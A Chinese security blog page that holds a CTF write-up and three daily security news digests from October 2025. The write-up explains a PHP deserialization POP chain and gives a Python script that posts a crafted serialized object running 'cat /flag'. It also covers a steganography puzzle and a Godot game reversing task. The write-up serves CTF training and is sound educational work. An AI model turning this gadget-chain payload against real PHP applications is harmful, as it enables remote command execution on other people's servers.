unserialize() 函数用于将通过serialize()函数序列化后的对象或数组进行反序列化,并返回原始的对象结构 并且代码里面没有进行任何的过滤和检验,那么如果类中定义了像: __destruct(),__toString(),__wakeup() __call()、__get()、__invoke() 等这样的魔术方法,攻击者就可以通过构造精心的序列化对象,就可以让 PHP 自动执行任意代码路径 而这份代码里刚好有一整套可链式调用的危险类 首先是class A public function start() {        echo $this->next;   } 当 echo $this->next 时,若 $this->next 是个对象且定义了 __toString(),则会触发它 接着是 class E public function __get($name){    if($name === "secret") {        echo "<br>".$name." maybe is here!</br>";        $this->found->check();   } } 这会触发 $this->found->check() 还有class H public function __destruct() {        $this->who->start();   } 在销毁时自动调用 $this->who->start() class U直接进行任意命令执行 public function __invoke() {    return $this->there->system($this->cmd); } 还有class F class V 也有类似的魔术方法,所以我们可以构造一串序列化对象,让程序在 unserialize() 时自动触发这一系列魔术方法,最终执行系统命令, 拿到flag,这就是脚本的思路 import requests import urllib.parse url = ""  #web1给的目标url payload_str = 'O:1:"H":3:{s:3:"who";O:1:"A":3:{s:5:"first";N;s:4:"step";N;s:4:"next";O:1:"V":4:{s:4:"good";N;s:4:"keep";N;s:6:"dowhat";s:6:"secret";s:2:"go";O:1:"E":3:{s:6:"\00E\00you";N;s:9:"\00E\00secret";s:8:"admin123";s:5:"found";O:1:"F":3:{s:5:"fifth";N;s:4:"step";N;s:9:"finalstep";s:1:"u";}}}} data = {    "payload": payload_str,    "cmd": "cat /flag" } try:    response = requests.post(url, data=data, timeout=10)    print("响应状态码:", response.status_code)    print("响应内容:\n", response.text) except Exception as e:    print("请求错误:", e) 用 requests.post 向目标 URL 发起一个表单 POST,请求体包含两个字段: payload:一个 PHP serialize() 格式的字符串(会被服务端 unserialize())。 cmd:要传给后续链路执行/使用的命令(在原始易受攻击代码中会被 U 类读取并最终交给 system()) 然后来依次解释payload_str 最外层:O:1:"H":3:{ ... } —— 一个 H 实例,3 个属性:who, are, you who → 是一个 A 对象:O:1:"A":3:{ ... } A 的 next 字段被设置成一个 V 对象:O:1:"V":4:{ ... } V->dowhat = "secret"(注意是字符串 "secret") V->go → 是一个 E 对象:O:1:"E":3:{ ... } 在 E 对象内,你看到 \00E\00secret 被赋值为 "admin123" E->found → 是一个 F 对象:O:1:"F":3:{ ... } F->finalstep 被设置为 s:1:"u" H 的其它属性 are、you 在 payload 里是 N。 简单点来说,就是payload 手工把 H → A → V → E → F 这样的对象关系构造出来,并把 F->finalstep 置为 'u',把 V->dowhat 置为 'secret',并把 E 的私有 secret 属性显式写成 "admin123" 那是如何触发ROP链的呢? 首先,服务端会执行 unserialize($_POST['payload']),然后在脚本结束或对象被回收时,H::__destruct() 会自动运行,其中有 $this->who- >start();,即会调用 A->start()去执行 echo $this->next; 由于 A->next 被设为一个对象 V,echo 会触发 V::__toString(),而V::__toString() 的操作是内部读取 $this->dowhat("secret"),然后执行 $this->go->$abc,即 E->secret,访问该属性会触发 E::__get('secret'),E::__get() 在检测到 $name === "secret" 时会执行 $this->found->check() —— 也就是调用 F::check() F::check() 会去检查 preg_match("/U/", $this->finalstep); 如果 finalstep 包含大写 U,则会不予继续执行 但这里 payload 把 finalstep 设为小写 'u'(s:1:"u"),preg_match("/U/","u") 不匹配,因此绕过了 所以因此 F::check() 会执行: $this->step = new $this->finalstep(); ($this->step)(); 这会 new 一个名为 'u' 的类,在 PHP 中类名不区分大小写,因此 'u' 会解析为 U 类,并随后把该实例当函数调用,触发 U::__invoke() 而U::__invoke() 会调用 $this->there->system($this->cmd) 而且,there 被构造为 N,而 N::__call() 会把方法名当作函数名执行(call_user_func($func_name,$args[0])),从而把 system($cmd) 真正执行出来 最后U::__construct() 在构造时会读取 $_POST['cmd'],即脚本里传的 "cat /flag",所以最终会对传入的 cmd 执行 所以成功拿到flag 2.misc-成功男人背后的女人 层层解包之后,发现是一张图片 这种一般都是图片里面隐藏有什么东西,用010打开看看 发现是mkbt,应该是那种自定义的模块,上网找找资料 发现是adobe fireworks 的专有格式,需要使用fireworks才能看到完整信息 https://zhuanlan.zhihu.com/p/32247127059打开之后发现一张隐藏图片 打开看看,发现是带有一些符号的图片 一开始还没有想明白这是什么东西,直到有师傅提醒说这是二进制,男是1,女是0,就可以转换为flag了..... 3.re1 拿到题目是个exe文件,先点开看看能不能运行,一运行就看到熟悉的界面,这个界面和图标太熟悉了!(别问我为什么会熟悉!) 这是Godot引擎写的游戏,所以得去找对应的逆向工具 https://github.com/GDRETools/gdsdecomp拿工具提取之后,就能发现所有文件的代码都能看到(这比C逆向好看多了) 在main.gdc文件中发现了一个类似输出结果分数的函数,怀疑这里就是flag输出的地方 当分数达到特定值 7906 时,把字符串 a 按自定义编码解码成文本 var bin_chunk = a.substr(i, 12):取出当前的 12 位子串 将这 12 位再分为 三个 4 位子串: hundreds = bin_chunk.substr(0, 4).bin_to_int():把前 4 位当作二进制数(0~15),转成整数,作百位数字 tens = bin_chunk.substr(4, 4).bin_to_int():中间 4 位,当作十位(0~15) units = bin_chunk.substr(8, 4).bin_to_int():最后 4 位,当作个位(0~15) var ascii_value = hundreds * 100 + tens * 10 + units:把三个小数位组组合成一个十进制数,计算方法是 hundreds*100 + tens*10 + units —— 也就是说每 4 位不是直接表示一个十进制数,而是分别代表 ASCII 值的百位、十位、个位 如果三个 4 位分别是 0000, 0001, 0010,那就是 0*100 + 1*10 + 2 = 12 → ASCII 码 12 result += String.chr(ascii_value):把计算出的十进制作为 ASCII 码,用 String.chr 转成字符并追加到 result 循环结束后,$HUD.show_message(result) 在 HUD 上显示解码后的整段文本 那脚本编写就很容易了,因为我们没时间在游戏中拿到7906分,所以可以直接把代码中字符串a的数值拷贝下来,然后再把上述代码张贴上去,让它跑字符串a的 数值就可以了,就这么简单 a = "0000011010000000011001010000100000110000011001110000100001000000011100000001001000110001001000000000011001110001000101110000011001100001000001010000011100000000100010010001000101000000010001010001000101110000010100110000100101110000100000000000010100000000010001010000100000010001000001100001000 flag = "" for i in range(0, len(a), 12):    bin_chunk = a[i:i+12]    hundreds = int(bin_chunk[0:4], 2)    tens = int(bin_chunk[4:8], 2)    units = int(bin_chunk[8:12], 2)    ascii_value = hundreds * 100 + tens * 10 + units    flag += chr(ascii_value) print(flag)
网络安全日报 2025年10月21日
1、 虚假Homebrew恶意软件借谷歌广告推广诱导macOS用户感染 https://hunt.io/blog/macos-odyssey-amos-malware-campaign 研究人员称,一起针对macOS开发者的恶意活动通过伪造Homebrew、LogMeIn与TradingView网站并借助Google Ads推广,诱导用户复制粘贴终端命令(“ClickFix”手法)来安装恶意软件。伪站点提供看似正常的下载入口,但复制按钮实际将base64编码的安装命令写入剪贴板,运行后会下载并执行install.sh,绕过Gatekeeper、移除隔离标记并以sudo提权。载荷为AMOS(已商业化的MaaS)或Odyssey Stealer,先检测虚拟机/分析环 2、欧盟破获跨国SIM卡犯罪网络 https://www.europol.europa.eu/media-press/newsroom/news/cybercrime-service-takedown-7-arrested 在代号为“SIMCARTEL”的行动中,欧洲刑警组织(Europol)联合多国警方摧毁了一个非法SIM盒服务网络,该网络租售虚假电话号码供网络犯罪使用,涉及3200多起诈骗案,造成损失超450万欧元。该服务通过网站gogetsms.com与apisim.com运营,拥有约1200台SIM盒设备和4万张SIM卡,为用户提供全球80多个国家注册的电话号码,用于开设和验证虚假账户,从而隐藏真实身份。警方指出,该 3、微软修复史上最严重ASP.NET漏洞 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-highest-severity-aspnet-core-flaw-ever/ 微软近日修复了一个被评为“ASP.NET Core史上最高严重等级”的漏洞(CVE-2025-55315),该漏洞存在于Kestrel Web服务器中,可被认证攻击者利用实施HTTP请求走私,从而劫持其他用户凭证或绕过前端安全控制。成功利用后,攻击者可访问敏感信息、篡改文件内容或导致服务器崩溃。微软已为Visual Studio 2022、ASP.NET Core 2.3、8.0与9.0 4、ConnectWise修复可被利用的Automate漏洞 https://www.connectwise.com/company/trust/security-bulletins/connectwise-automate-2025.9-security-fix ConnectWise发布安全更新,修复其远程监控与管理平台Automate中的两项严重漏洞,其中编号为CVE-2025-11492的漏洞严重度高达9.6,因代理可通过未加密的HTTP通信,可能被攻击者实施“中间人攻击”(AiTM),拦截或篡改指令、凭证及更新数据。另一漏洞CVE-2025-11493缺乏更新包完整性验证,攻击者可借此伪造合法服务器推送恶意更新。两者结合可使攻击者在高权限环境 5、美航子公司Envoy遭Clop窃取Oracle数据 https://www.bleepingcomputer.com/news/security/american-airlines-subsidiary-envoy-confirms-oracle-data-theft-attack/ 美国航空旗下地区航空公司Envoy Air证实,其Oracle E-Business Suite系统遭到数据窃取,此前Clop勒索团伙在其泄露网站上公布了所谓被盗数据。Envoy表示事件发生后立即展开调查并报警,经审查确认未涉及客户或敏感信息,仅部分业务资料与商业联系方式受影响。该事件与Clop于今年8月发起的Oracle数据盗取行动有关,攻击者利用零日漏洞CV 6、银狐组织攻击范围扩展至日本和马来西亚 https://www.freebuf.com/articles/453198.html 网络安全研究人员发现,被称为Winos 4.0(又名ValleyRAT)的恶意软件家族背后的威胁行为者已将其攻击范围从中国大陆和台湾地区扩展到日本和马来西亚,此次攻击使用了另一个远程访问木马(RAT)——HoldingHands RAT(又名Gh0stBins)。 7、Spring两大漏洞可导致泄露敏感信息及安全防护绕过 https://securityonline.info/spring-patches-two-flaws-spel-injection-cve-2025-41253-leaks-secrets-stomp-csrf-bypasses-websocket-security/ Spring发布两项高危漏洞修复:CVE-2025-41253影响Spring Cloud Gateway,可能导致SpEL注入泄露敏感数据;CVE-2025-41254影响Spring Framework,允许WebSocket CSRF绕过发送未授权消息。建议用户立即升级或采取临时防护措施。 8、思科修复桌面及IP电话高危DoS漏洞 https://securityonline.info/cisco-patches-high-severity-cve-2025-20350-dos-flaw-in-desk-and-ip-phones/ 思科修复两款高危漏洞(CVE-2025-20350和CVE-2025-20351),影响9800、7800、8800和8875系列电话,可能导致DoS或XSS攻击。漏洞利用需启用Web访问(默认禁用)。思科已发布固件更新,建议用户尽快升级。 9、CISA警告Windows访问控制漏洞正遭攻击者利用 https://cybersecuritynews.com/windows-improper-access-control-vulnerability/ CISA警告Windows高危漏洞CVE-2025-59230正被利用,该漏洞允许本地提权控制整个网络,影响Win10/11及Server版本。微软已发布补丁,联邦机构须在11月5日前修复,否则面临数据泄露风险。建议立即更新并限制远程访问。 10、神秘象APT组织渗透亚太政府机构窃取敏感信息 https://cybersecuritynews.com/mysterious-elephant-apt-hackers-infiltrate-organization/ 神秘象APT组织针对亚太政府机构,利用钓鱼邮件触发Office漏洞(CVE-2017-11882),部署BabShell和MemLoader HidenDesk加载器窃取WhatsApp数据,采用XOR加密外传,技术成熟且隐蔽性强。 声明 以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年10月20日
1、SAP NetWeaver漏洞可使攻击者无需登录即可接管服务器 https://onapsis.com/blog/sap-security-patch-day-october-2025/ SAP发布10月安全更新,修复13项漏洞,其中最严重的CVE-2025-42944(CVSS 10.0)存在于NetWeaver AS Java中,源于RMI-P4模块的不安全反序列化,攻击者可在无需登录的情况下通过开放端口提交恶意载荷,实现任意系统命令执行,完全控制服务器。此次更新在原有修复基础上新增JVM级过滤机制(jdk.serialFilter),防止敏感类被反序列化。此外,SAP还修复了打印服务目录遍历漏洞(CVE-2025-42937,CVSS 9.8)与供 2、Red Lion RTU中的两个漏洞可能使黑客获得完全工业控制权 https://claroty.com/team82/research/roaring-access-exploiting-a-pre-auth-root-rce-on-sixnet-rtus 研究人员披露,Red Lion SixTRAK与VersaTRAK系列RTU存在两处最高评分漏洞(CVE-2023-42770、CVE-2023-40151),可被未认证攻击者绕过验证并以根权限执行任意命令,影响能源、水务、交通等工业控制场景。厂商与CISA已发布通告并提供修补建议;建议用户尽快打补丁、启用设备用户认证并阻断对受影响设备的TCP访问以降低被链式利用的风险。 3、黑客利用思科SNMP漏洞在“Zero Disco”攻击中部署恶意软件 https://www.trendmicro.com/en_us/research/25/j/operation-zero-disco-cisco-snmp-vulnerability-exploit.html 研究人员披露,代号“Zero Disco”的攻击利用Cisco IOS/IOS XE中的SNMP栈溢出漏洞CVE-2025-20352(CVSS 7.7)在未打补丁的旧设备(9400、9300、3750G 等)上部署Linux根套件。入侵者通过构造的SNMP包触发代码执行,随后在IOSd内存植入钩子、设置包含“disco”字样的通用密码、并通过UDP控制器开启后门、禁用日志与篡改配置 4、朝鲜黑客利用区块链“EtherHiding”技术投递恶意软件 https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding Google威胁情报组(GTIG)发现,朝鲜国家级黑客组织UNC5342自2025年2月起在“Contagious Interview”行动中采用“EtherHiding”技术,通过智能合约在以太坊和币安智能链上隐藏并投递恶意代码。这是首次发现国家级攻击者使用该方法。该技术可将载荷嵌入区块链智能合约中,凭借匿名性和抗下架性实现隐蔽传播。攻击者伪装成招聘人员,诱骗开发者在“面试考核”中运行JavaScript下载器,加载名为“JADE 5、微软阻断针对Teams用户的勒索攻击 https://www.bleepingcomputer.com/news/microsoft/microsoft-disrupts-ransomware-attacks-targeting-teams-users/ 微软近日成功阻止一系列由威胁组织“Vanilla Tempest”(又称 Vice Society、VICE SPIDER)发起的Rhysida勒索软件攻击。该组织通过伪造的Teams安装网站(如teams-install[.]top等)和恶意广告投放传播伪造的“MSTeamsSetup.exe”文件,利用签名恶意证书分发Oyster后门(又名Broomstick或CleanU 6、CISA警告Adobe严重漏洞已被攻击者利用 https://www.cisa.gov/news-events/alerts/2025/10/15/cisa-adds-one-known-exploited-vulnerability-catalog CISA近日警告称,攻击者正积极利用Adobe Experience Manager(AEM)中的严重漏洞(CVE-2025-54253)发起攻击。该漏洞源自AEM Forms在JEE 6.5.23及更早版本中的配置缺陷,允许未认证的攻击者绕过安全机制并执行远程代码。成功利用该漏洞无需用户交互,攻击复杂度低。该漏洞于2025年4月由Searchlight Cyber的研究员发现,并报告给A 7、超过26.6万F5 BIG-IP实例暴露于远程攻击风险中 https://www.bleepingcomputer.com/news/security/over-266-000-f5-big-ip-instances-exposed-to-remote-attacks/ 2025年10月16日,BleepingComputer报道指出,超过26.6万台F5 BIG-IP设备暴露于远程攻击风险,可能遭遇严重的网络攻击。这些设备广泛应用于企业数据中心中,负责管理应用程序流量和负载均衡。然而,多个F5 BIG-IP版本中存在未修复的高危漏洞,黑客可以通过这些漏洞远程执行恶意命令,危及企业的网络安全。该问题源自F5 BIG-IP系统中的多个漏洞,其中最严重 8、WatchGuard VPN漏洞可导致攻击者远程接管设备 https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015 2025年10月17日,网络安全研究人员披露了一项已修复的WatchGuard Fireware漏洞(CVE-2025-9242),该漏洞可能允许未经身份验证的远程攻击者执行任意代码,严重威胁VPN服务的安全。该漏洞影响了多个版本的Fireware OS,包括11.10.2至12.11.3和2025.1,CVSS评分高达9.3。攻击者可以通过利用该漏洞,在VPN隧道建立过程中的IKE_SA_AUTH阶段触发缓冲区溢出,从而实现远程代码执行。漏洞的根源在于“ike2_P 9、丝绸诱饵行动:中国金融科技企业遭恶意简历LNK文件攻击 https://securityonline.info/operation-silk-lure-chinese-espionage-targets-fintech-with-malicious-resume-lnk-to-implant-valleyrat/ Seqrite实验室发现"丝绸诱饵行动"网络活动,攻击者伪装求职者发送恶意简历.LNK文件,针对中国金融科技企业。攻击链包含多阶段载荷、计划任务持久化和ValleyRAT木马,具备数据窃取和反检测能力,C2服务器位于美国。 10、国安破获美国NSA入侵中国国家授时中心案 https://www.ithome.com/0/890/556.htm 2022 年 3 月 25 日起,美国安局利用某境外品牌手机短信服务漏洞,秘密网攻控制国家授时中心多名工作人员的手机终端,窃取手机内存储的敏感资料。2023 年 4 月 18 日起,美国安局多次利用窃取的登录凭证,入侵国家授时中心计算机,刺探该中心网络系统建设情况。2023 年 8 月至 2024 年 6 月,美国安局专门部署新型网络作战平台,启用 42 款特种网攻武器,对国家授时中心多个内部网络系统实施高烈度网攻,并企图横向渗透至高精度地基授时系统,预置瘫痪破坏能力。 声明 以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年10月17日
1、威胁行为者通过OpenVSX平台投放恶意VSCode扩展 https://www.koi.ai/blog/tiger-jack-malicious-vscode-extensions-stealing-code 安全研究机构Koi Security发现,名为TigerJack的威胁行为者再次通过OpenVSX平台投放恶意VSCode扩展,针对开发者窃取加密货币并植入后门。此前已在微软VSCode市场下架的扩展 “C++ Playground” 和 “HTTP Format” 仍在OpenVSX上可下载。前者通过监听编辑事件实时外传源代码,后者则在后台运行CoinIMP挖矿程序,占用全部主机算力。此外,部分扩展还能从远程服务器周期性加载并执行Java 2、近20万台Framework笔记本曝Secure Boot绕过风险 https://eclypsium.com/blog/bombshell-the-signed-backdoor-hiding-in-plain-sight-on-framework-devices/ 固件安全公司Eclypsium报告称,美国电脑厂商Framework约20万台运行Linux的笔记本和桌面系统存在Secure Boot绕过风险。问题源于其出厂固件中包含签名的UEFI Shell组件,其中的 “mm” 命令 可直接读写系统内存。攻击者可利用该命令篡改关键变量gSecurity2,将其置空以禁用签名验证,从而加载恶意bootkit(如 BlackLotus、HybridPety 3、美司法部查获150亿美元“杀猪盘”加密资产 https://www.justice.gov/usao-edny/pr/chairman-prince-group-indicted-operating-cambodian-forced-labor-scam-compounds-engaged 美国司法部宣布,从柬埔寨犯罪组织 “Prince Group” 首领陈志(又名Vincent)处查获约150亿美元比特币。该集团自2015年起在全球三十余国设立百余家空壳公司,通过社交媒体与交友平台实施“杀猪盘”式加密投资诈骗,诱骗受害者投入虚假项目后转移资金。调查显示,组织在柬埔寨设有封闭园区,强迫数千人从事诈骗并以暴力威胁控制。陈志涉嫌贿赂官员 4、F5遭国家级黑客入侵泄露BIG-IP源代码与漏洞信息 https://my.f5.com/manage/s/article/K000154696 美国网络安全公司F5披露,其系统遭国家级黑客入侵,导致BIG-IP产品源代码及未公开漏洞信息被窃取。事件最早于2025年8月9日被发现,调查显示攻击者长期潜伏于F5的产品开发与工程知识平台中,外泄部分客户配置与实现细节。尽管尚无证据表明被盗漏洞被利用或源代码遭篡改,F5强调软件供应链安全未受影响。公司已重置凭据、强化访问控制,并委托NCC Group、IOActive、CrowdStrike与Mandiant独立审查。为防范潜在风险,F5发布多项安全更新及威胁狩猎指南,建议用户及时升级BIG-IP、F 5、黑客假冒LastPass与Bitwarden邮件诱导用户下载远控木马 https://blog.lastpass.com/posts/october-13-2025-phishing-campaign 安全通报指出,一波冒充LastPass与Bitwarden的钓鱼邮件谎称发生泄露,诱导用户下载“更安全”的桌面客户端。实际上,所下载二进制会安装Syncro MSP代理并进一步部署ScreenConnect远程访问工具——隐藏托盘、定期回连、并尝试禁用安全软件。攻击者可借此远程控制受害主机、部署恶意载荷并窃取密码管理器凭证。LastPass已声明未遭入侵,Cloudflare已屏蔽相关落地页;安全研究建议用户仅通过官方网站获取更新,切勿运行来路不明的安装包。 6、Rockwell RAT路由器存在严重漏洞可完全接管 https://www.anquanke.com/post/id/312605 罗克韦尔自动化(Rockwell Automation)发布新安全公告,警告客户其1783-NATR网络地址转换(NAT)路由器存在三个漏洞,其中包括一个严重的认证绕过缺陷,可能导致受影响设备被完全接管管理员权限。 7、Chrome修复安全浏览组件中的高危UAF漏洞 https://www.anquanke.com/post/id/312611 谷歌已发布面向桌面端的新稳定版更新,将在未来几天至几周内逐步推送至Windows、macOS和Linux系统。此次更新将Windows和Mac版Chrome升级至141.0.7390.107/.108,Linux版升级至141.0.7390.107,修复了一个高严重性安全漏洞,该漏洞可能允许攻击者利用Chrome的安全浏览(Safe Browsing)组件发起攻击。 8、Veeam Backup 中被发现存在严重RCE漏洞 https://www.anquanke.com/post/id/312608 Veeam Software已发布补丁,修复三个新披露的漏洞,其中包括Veeam Backup & Replication中的两个严重远程代码执行(RCE)漏洞,以及Veeam Agent for Microsoft Windows中的一个权限提升漏洞。 9、Microsoft IIS 漏洞允许未授权攻击者执行恶意代码 https://www.freebuf.com/articles/web/452780.html 微软近日披露其互联网信息服务(IIS)平台存在一个关键的远程代码执行漏洞,该漏洞对依赖Windows服务器进行网络托管的企业构成安全风险。该漏洞编号为CVE-2025-59282,影响处理全局内存的Inbox COM Objects组件,源于竞态条件(race condition)和释放后使用(use-after-free)错误。微软于2025年10月14日发布公告,将其CVSS 3.1基础评分定为7.0,评级为"重要"。 10、Altamides监控平台曝光:全球上万位政要、记者与高管遭秘密追踪 https://www.secrss.com/articles/84023 最近,一项国际调查揭露了一个名为Altamides的电话跟踪平台,这个平台已秘密运作20年,利用电信协议漏洞,仅凭一个电话号码就能实时定位全球任何人的位置。根据泄露的记录,这个平台被用于监视超过14,000个电话号码,目标包括政治人物、知名高管、记者和活动人士。这不仅仅是技术漏洞的滥用,更是全球监视产业的黑暗一角。 声明 以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页